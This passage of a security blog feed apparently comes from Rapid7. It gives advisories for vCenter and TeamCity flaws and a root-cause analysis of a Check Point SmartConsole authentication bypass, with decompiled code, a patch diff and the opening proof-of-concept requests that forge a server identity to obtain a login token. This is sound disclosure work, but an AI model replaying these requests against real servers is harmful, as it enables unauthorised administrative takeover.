plane.</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-59310</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A directory traversal vulnerability in the vCenter Syslog server that could allow an attacker with network access to execute arbitrary code.</span></p></td></tr></tbody></table><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>VMware vCenter Server provides centralized management for VMware vSphere environments, allowing administrators to manage ESXi hosts, virtual machines, resource allocation, availability, and other virtualization infrastructure from a central control plane. Compromise of vCenter can therefore provide an attacker with significant control over the virtualized environment and its associated workloads.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Both vulnerabilities are particularly significant because exploitation does not require prior authentication. However, an attacker must have network access to the affected vCenter services. Management interfaces such as vCenter are commonly restricted to internal or dedicated management networks, which can reduce exposure to internet-based attacks but does not mitigate the risk from an attacker who has already established access to an organization’s network.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At the time of publication, there is no known evidence of exploitation or scanning in the wild for either CVE-2026-59309 or CVE-2026-59310. There is also currently no known public proof-of-concept exploit code. However, vCenter Server has appeared on CISA’s KEV list ten times in the past for other vulnerabilities, so it is known that attackers target critical issues in this product. Customers running affected VMWare products are urged to patch on an urgent basis before exploitation in-the-wild occurs.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running VMware vCenter Server should prioritize applying the updates identified by Broadcom in </span><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/38017"><span style='font-size: undefined;'>VMSA-2026-0006</span></a><span style='font-size: undefined;'> on an urgent basis. Broadcom states that there are no workarounds for CVE-2026-59309 or CVE-2026-59310, making vendor-provided updates the primary remediation.</span></p><table><colgroup data-width='1250'><col style="width:30.60897435897436%"/><col style="width:14.903846153846153%"/><col style="width:19.391025641025642%"/><col style="width:14.743589743589745%"/><col style="width:20.352564102564102%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>VMware Product</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Component</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Version</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Running On</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Fixed Version</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>VMware Cloud Foundation,</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>VMware vSphere Foundation</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vCenter</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.1.x.x</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Any</span></p></td><td><p style="direction: ltr;"><a href="https://techdocs.broadcom.com/bin/gethidpage?ux-context-string=vcenter-9-1-0-3&amp;appid=vcf-9-1&amp;language=en&amp;format=rendered"><span style='font-size: undefined;'>9.1.0.0300</span></a></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>VMware Cloud Foundation,</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>VMware vSphere Foundation</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vCenter</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.0.x.x</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Any</span></p></td><td><p style="direction: ltr;"><a href="https://techdocs.broadcom.com/bin/gethidpage?ux-context-string=9-0-2-0-1&amp;appid=vcf-9-0&amp;language=en&amp;format=rendered"><span style='font-size: undefined;'>9.0.2.0100</span></a></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>VMware vCenter</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>8.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Any</span></p></td><td><p style="direction: ltr;"><a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/vcenter-server-update-and-patch-release-notes/vsphere-vcenter-server-80u3k-release-notes.html"><span style='font-size: undefined;'>8.0 U3k</span></a></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>VMware Cloud Foundation </span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vCenter</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>5.x</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Any</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Async patch to </span><a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/vcenter-server-update-and-patch-release-notes/vsphere-vcenter-server-80u3k-release-notes.html"><span style='font-size: undefined;'>8.0 U3k</span></a></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>VMware Telco Cloud Platform</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vCenter</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>3.0, 4.x, 5.0.x, 5.1.x</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Any</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Refer to </span><a href="https://knowledge.broadcom.com/external/article/449886"><span style='font-size: undefined;'>KB449886</span></a></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>VMware Telco Cloud Infrastructure </span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vCenter</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>3.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Any</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Refer to </span><a href="https://knowledge.broadcom.com/external/article/449886"><span style='font-size: undefined;'>KB449886</span></a></p></td></tr></tbody></table><p style="direction: ltr;"><br/><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the vendor </span><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/38017"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-59309 and CVE-2026-59310 on </span><span style='color:rgb(29, 28, 29);font-size: undefined;'>VMware vCenter Server, Cloud Foundation, and vSphere Foundation products </span><span style='font-size: undefined;'>with unauthenticated vulnerability checks expected to be available in the July 30 content release.</span></p><h2>Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 30, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>July 30, 2026: </strong></span><span style='font-size: undefined;'>Updated customers section to reflect availability of vulnerability checks.</span></li><li><span style='font-size: undefined;'><strong>August 4, 2026: </strong></span><span style='font-size: undefined;'>Updated CVE links.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-vmware-vcenter-vulnerabilities-allow-authentication-bypass-and-remote-code-execution-cve-2026-59309-cve-2026-59310</link>
      <guid isPermaLink="false">bltb95fec0bd8034857</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 30 Jul 2026 10:35:21 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-63077: Critical unauthenticated remote code execution in JetBrains TeamCity]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 27, 2026, JetBrains published a </span><a href="https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-63077"><span style='font-size: undefined;'>CVE-2026-63077</span></a><span style='font-size: undefined;'>, a critical unauthenticated vulnerability affecting all versions of TeamCity On-Premises. The issue is classified as deserialization of untrusted data and has a CVSS score of </span><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8</span></a><span style='font-size: undefined;'>. An unauthenticated remote attacker with HTTP(S) access to a TeamCity server can exploit the agent polling protocol to bypass authentication checks and execute arbitrary operating system commands with the privileges of the TeamCity server process.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In the</span><a href="https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/"><span style='font-size: undefined;'> blog post</span></a><span style='font-size: undefined;'> that JetBrains shared in tandem with CVE publication, they stated that attackers who exploit the vulnerability can read stored credentials and compromise CI/CD pipeline integrity. The impact of successful exploitation depends on the operating system privileges granted to the TeamCity server process. At the time of disclosure, JetBrains stated that they were not aware of active exploitation. On August 5, CISA added CVE-2026-63077 to its </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank"><span style='font-size: undefined;'>KEV catalog</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Technical analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On August 7, 2026, Rapid7 Labs published a full root cause </span><a href="https://www.rapid7.com/blog/post/ra-unauthenticated-rce-in-jetbrains-teamcity-cve-2026-63077/" target="_self"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> of CVE-2026-63077. Our analysis details the vulnerability and how an unauthenticated attacker can exploit the vulnerability to achieve remote code execution on a vulnerable TeamCity server.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running TeamCity On-Premises should urgently prioritize updating to a fixed version, either via the TeamCity UI </span><a href="https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/"><span style='font-size: undefined;'>update workflow</span></a><span style='font-size: undefined;'> or by </span><a href="https://www.jetbrains.com/teamcity/download/other.html"><span style='font-size: undefined;'>downloading and installing</span></a><span style='font-size: undefined;'> one of the following fixed versions:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>TeamCity 2025.11.7</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>TeamCity 2026.1.3</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>All versions of TeamCity On-Premises are affected. Organizations that cannot upgrade can apply JetBrains' </span><a href="https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/"><span style='font-size: undefined;'>security patch plugin</span></a><span style='font-size: undefined;'> to TeamCity 2017.1 and later. The plugin addresses only CVE-2026-63077; JetBrains recommends upgrading to a fixed version to receive other security updates. TeamCity Cloud customers do not need to take action.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to patching, as a defense-in-depth measure, Rapid7 recommends restricting network access to TeamCity servers to only users and systems that must have it. For the latest mitigation guidance, please refer to the </span><a href="https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/"><span style='font-size: undefined;'>JetBrains security advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-63077 with a vulnerability check available in the July 28 content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 29, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 5, 2026:</strong></span><span style='font-size: undefined;'> Updated to reflect the addition of CVE-2026-63077 to CISA KEV.</span></p></li><li><span style='font-size: undefined;'><strong>August 7, 2026:</strong></span><span style='font-size: undefined;'> Added link to the Rapid7 Analysis.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-63077-critical-unauthenticated-remote-code-execution-in-jetbrains-teamcity</link>
      <guid isPermaLink="false">blt0dc15d9ebe354558</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 29 Jul 2026 16:16:48 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Analysis: Check Point SmartConsole Authentication Bypass (CVE-2026-16232)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 22, 2026, Check Point published a </span><a href="http://sk185169.md"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-16232/"><span style='font-size: undefined;'>CVE-2026-16232</span></a><span style='font-size: undefined;'>, an authentication bypass in the SmartConsole login process affecting Security Management Server and Multi-Domain Security Management Server (MDS). </span><span style='font-size: undefined;'><strong>By leveraging CVE-2026-16232, an unauthenticated attacker can obtain an application login token, use this token to log in through SmartConsole with full administrator privileges, and modify the security policy or security configuration.</strong></span><span style='font-size: undefined;'> Exploitation requires network access to the Management Server and for a Trusted Clients configuration that does not restrict GUI clients, which in our testing was a default setting. This vulnerability was reported as being </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-16232-critical-check-point-smartconsole-authentication-bypass-exploited-in-the-wild/"><span style='font-size: undefined;'>exploited</span></a><span style='font-size: undefined;'> in the wild as a zero-day vulnerability at the time of disclosure.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our analysis finds that the root cause of CVE-2026-16232 is a broken trust boundary in the application authentication path. A vulnerable server accepts an attacker-supplied Secure Internal Communication (SIC) distinguished name (DN) as the identity of a remote application instead of binding that identity to the authenticated remote peer certificate DN returned by </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>getCertificateDnName()</span></span><span style='font-size: undefined;'>. An attacker can read the management server's own SIC DN during the unauthenticated bootstrap communication, replay that DN in a forged application certificate bind, obtain an application token, and then ask the legacy management service to mint a new SmartConsole single sign-on (SSO) ticket.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Labs has reproduced CVE-2026-16232 against affected R81.20 and R82.10 versions of the target software. Our </span><a href="https://github.com/sfewer-r7/CVE-2026-16232"><span style='font-size: undefined;'>proof-of-concept</span></a><span style='font-size: undefined;'> (PoC) exploit script can be used to successfully validate if a target is either vulnerable or patched. The vendor supplied patches have been confirmed to successfully remediate the vulnerability and prevent our PoC script from succeeding.</span></p><h2 style="direction: ltr;">Analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>SmartConsole is the desktop client administrators use to manage Check Point policy and configuration. A SmartConsole login crosses two generations of management plumbing over the network.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The first is the legacy FWM/CPMI service, listening on TCP </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>18190</span><span style='font-size: undefined;'>. It uses SIC, Check Point's certificate-based trust mechanism for communication between management components. Once the SIC bootstrap completes, FWM exchanges length-prefixed “FwSet” objects, a Check Point name/value encoding used by older management services.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The second is the newer CPM/DLE service. This exposes SOAP services over HTTPS on TCP </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>19009</span><span style='font-size: undefined;'> under the URI path </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/cpmws/</span></span><span style='font-size: undefined;'>. SmartConsole uses these services for login, queries, and object operations. Authenticated requests carry </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>DLESESSIONID</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>CLIENTSESSIONID</span></span><span style='font-size: undefined;'> header values to prove a client is authenticated.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The exploit for CVE-2026-16232 uses both the FWM/CPMI and CPM/DLE services. It first uses the native FWM/CPMI protocol to claim an application identity and obtain an application token via the root cause of the vulnerability. It then uses the accepted native application session to ask FWM for a SmartConsole SSO ticket, redeems the ticket over CPM's SOAP API, and receives a SmartConsole session.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The diagram below shows the flow for exploiting CVE-2026-16232.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ff4314d8e4a6f3a/6a68f0e61337f73a300c766c/figure1.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure1.png" asset-alt="figure1.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ff4314d8e4a6f3a/6a68f0e61337f73a300c766c/figure1.png" data-sys-asset-uid="blt1ff4314d8e4a6f3a" data-sys-asset-filename="figure1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure1.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'><em>Figure 1: Flow diagram of exploitation.</em></span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>The application authentication boundary</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The Java login service contains a bridge for FWM application based logins. The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>authenticateUser</span></span><span style='font-size: undefined;'> method splits the supplied username into an application name and a SIC DN, then passes both into </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cpApplicationAuthentication()</span></span><span style='font-size: undefined;'>. </span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="java">// Source: work/t146/mgmt_wrapper.tgz:fw1/cpm-server/dleserver.jar.full!/com/checkpoint/management/dleserver/coresvc/internal/LoginSvcImpl.class

private AuthenticationResponse authenticateUser(AuthenticationInfoBase authenticationInfoBase, String string, String string2, CPUUID cPUUID, boolean bl, LockAdminInfoContainer lockAdminInfoContainer, ExternalLoginInfo externalLoginInfo) throws AuthenticationFailureLoginException, LicenseExpiredLoginException {

// ...

} else if (authenticationInfoBase instanceof FwmAuthenticationInfo) {
    object2 = authenticationInfoBase.getUsername();
    int n = ((String)object2).toLowerCase().lastIndexOf("cn=");
    object = (FwmAuthenticationInfo)authenticationInfoBase;
    if (FwmLoginType.APPLICATION.equals((Object)object.getFwmLoginType())) {
        String suppliedSicDn = ((String)object2).substring(n); // &lt;-- [1]
        String applicationName = ((String)object2).substring(0, n - 1); // &lt;-- [2]
        TdLog.debug((CPLogger)c, (String)"Authenticating FwmAuthenticationInfo on behalf of application {}", (Object[])new Object[]{applicationName});
        CPApplicationAuthenticationInfo cPApplicationAuthenticationInfo = new CPApplicationAuthenticationInfo();
        cPApplicationAuthenticationInfo.setUsername(applicationName);
        this.cpApplicationAuthentication((AuthenticationInfoBase)cPApplicationAuthenticationInfo, suppliedSicDn, cPUUID);// &lt;-- [3]
        authenticationInfoBase.setUsername(applicationName);</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'>, the login service treats attacker-controlled input as both the application name and the claimed SIC identity. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'>, the untrusted DN claim reaches the remote application authenticator as a separate argument.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The method that consumes that identity is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>authenticateRemoteApplication()</span></span><span style='font-size: undefined;'>. This method prefers the attacker-supplied DN whenever one is present.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="java">// Source: work/t146/mgmt_wrapper.tgz:fw1/cpm-server/dleserver.jar.full!/com/checkpoint/management/dleserver/coresvc/internal/LoginSvcImpl.class

private void authenticateRemoteApplication(String applicationName, String suppliedSicDn) throws AuthenticationFailureLoginException {
  String effectiveSicDn = suppliedSicDn == null
          ? this.j.getCertificateDnName()
          : suppliedSicDn; // &lt;-- [1]
  CpAssert.cpassert(StringUtils.isNotEmpty(effectiveSicDn), "User DN name is not set");
  if (effectiveSicDn.equals("CN=siclocal")) {
    this.authenticateLocal(applicationName);
  } else {
    this.t.identifyDomainForRemoteLogin(effectiveSicDn); // &lt;-- [2]
  }
}</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The problem is at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'>. The vulnerable code collapses the untrusted claim and the authenticated peer identity into one variable. If </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>suppliedSicDn</span></span><span style='font-size: undefined;'> is present, the code never uses </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>getCertificateDnName()</span></span><span style='font-size: undefined;'> at all. The method then uses the attacker-controlled value at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'> to identify the login domain. In practice, a remote client can copy the management server's own SIC DN into </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>:DN</span></span><span style='font-size: undefined;'> and authenticate as a remote application without presenting a client certificate for that identity.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>What the patch changes</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Our analysis compares the decompiled </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>com.checkpoint.management.dleserver.coresvc.internal.LoginSvcImpl</span></span><span style='font-size: undefined;'> class from a vulnerable “R81.20 Jumbo Hotfix Take 146” against the patched “R81.20 Jumbo Hotfix Take 158”.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="diff">private void authenticateRemoteApplication(String applicationName, String suppliedSicDn)
         throws AuthenticationFailureLoginException {
-    String effectiveSicDn = suppliedSicDn == null
-        ? this.j.getCertificateDnName()
-        : suppliedSicDn;                                      // &lt;-- [1]
-    CpAssert.cpassert(StringUtils.isNotEmpty(effectiveSicDn), "User DN name is not set");
+    String effectiveSicDn;
+    String certificateDn = this.j.getCertificateDnName();
+    String remoteIp = this.j.getRemoteIpAddress();
+    boolean localSic = IpUtils.isLoopback(remoteIp) && "CN=siclocal".equals(certificateDn);
+    if (localSic && suppliedSicDn != null) {
+        effectiveSicDn = suppliedSicDn;                       // &lt;-- [2]
+    } else {
+        effectiveSicDn = certificateDn;                       // &lt;-- [3]
+        boolean mismatch = suppliedSicDn != null
+            && StringUtils.isNotEmpty(certificateDn)
+            && !suppliedSicDn.equalsIgnoreCase(certificateDn);
+        if (mismatch) {
+            TdLog.error(c,
+                "Rejecting caller-supplied SIC name that does not match the client certificate DN for application {} from {}",
+                applicationName, remoteIp);
+            throw new AuthenticationFailureLoginException(
+                "Remote authentication failed for peer " + remoteIp + "."); // &lt;-- [4]
+        }
+    }
+    if (Strings.isNullOrEmpty(effectiveSicDn)) {
+        TdLog.error(c, "Remote application {} login rejected: no authenticated SIC identity",
+            applicationName);
+        throw new AuthenticationFailureLoginException(
+            "Remote authentication failed for peer " + remoteIp + ".");     // &lt;-- [5]
+    }
     if (effectiveSicDn.equals("CN=siclocal")) {
         this.authenticateLocal(applicationName);
     } else {
         this.t.identifyDomainForRemoteLogin(effectiveSicDn);
     }
 }</pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Shown above, the vulnerable “Take 146” accepts the caller's DN at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'>. The patched “Take 158” only allows a supplied DN for loopback </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>CN=siclocal</span></span><span style='font-size: undefined;'> traffic at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'>, which preserves the local application case. Remote clients now use the authenticated remote peer certificate DN at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'>, and any mismatch between the supplied DN and that authenticated identity is rejected at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[4]</span></span><span style='font-size: undefined;'>. The new empty identity check at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[5]</span></span><span style='font-size: undefined;'> also prevents a remote application login when there is no authenticated SIC identity at all.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is why replaying the management server's DN no longer works. The attacker can still send the same </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>:DN</span></span><span style='font-size: undefined;'> text, but the patched remote path does not use that text as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>effectiveSicDn</span></span><span style='font-size: undefined;'>. If the client presents no certificate, as in our PoC, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>certificateDn</span></span><span style='font-size: undefined;'> is empty and the check at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[5]</span></span><span style='font-size: undefined;'> rejects the login. If the client presents a certificate with some other DN, the mismatch check at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[4]</span></span><span style='font-size: undefined;'> rejects the forged server DN. To make the supplied server DN survive the patched checks, the attacker would need an authenticated client certificate whose subject DN already matches that server DN, which removes the unauthenticated bypass.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Protocol flow to a SmartConsole session</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The relevant application-layer traffic is shown below in the order our PoC sends it. For brevity, we have omitted the boilerplate CA and CRL bootstrap exchange as it is not pertinent to the vulnerability’s root cause.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>After the SIC bootstrap, the PoC sends a certificate bind request that supplies the management server's own SIC DN (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cp_mgmt,o=gw-5622ca..5otbwa</span></span><span style='font-size: undefined;'> in the example below):</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">(
    :local_bind (0)
    :token_bind (0)
    :DN ("cn=cp_mgmt,o=gw-5622ca..5otbwa") # &lt;-- attacker-controlled identity
    :certificate_bind (1)
    :application_login ("CPM Server")
    :client_without_administrator (true)
)</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Despite the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>:certificate_bind</span></span><span style='font-size: undefined;'> field name, the PoC does not load or present a client certificate in its Python TLS context. The bind request only provides the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>:DN</span></span><span style='font-size: undefined;'> claim as a text string. On a vulnerable server, the bind succeeds because the application login path accepts </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>:DN</span></span><span style='font-size: undefined;'> as the effective SIC identity. The PoC then sends an </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>open-database</span></span><span style='font-size: undefined;'> request, shown below, and receives the application login token described in Check Point's advisory.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">(
    :type (command)
    :subject (open-database)
    :body (
        :Name ()
        :db_open_reason ()
        :dle_session_id ()
        :database ()
        :db_open_id ("(nil)")
    )
    :no-reply (false)
)</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>open-database</span></span><span style='font-size: undefined;'> response is a binary-encoded FwSet object. The PoC extracts the 43-character DLE token from that response and then uses it as a CPM </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>DLESESSIONID</span></span><span style='font-size: undefined;'> value.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The next step is to perform a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>gen-sso-token</span></span><span style='font-size: undefined;'> request. The forged application session asks FWM to create a SmartConsole ticket whose original client claims </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>system_admin</span></span><span style='font-size: undefined;'>, local SOAP binding, and a permission bitmap indicating full permissions (i.e. all permission bits are set):</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre 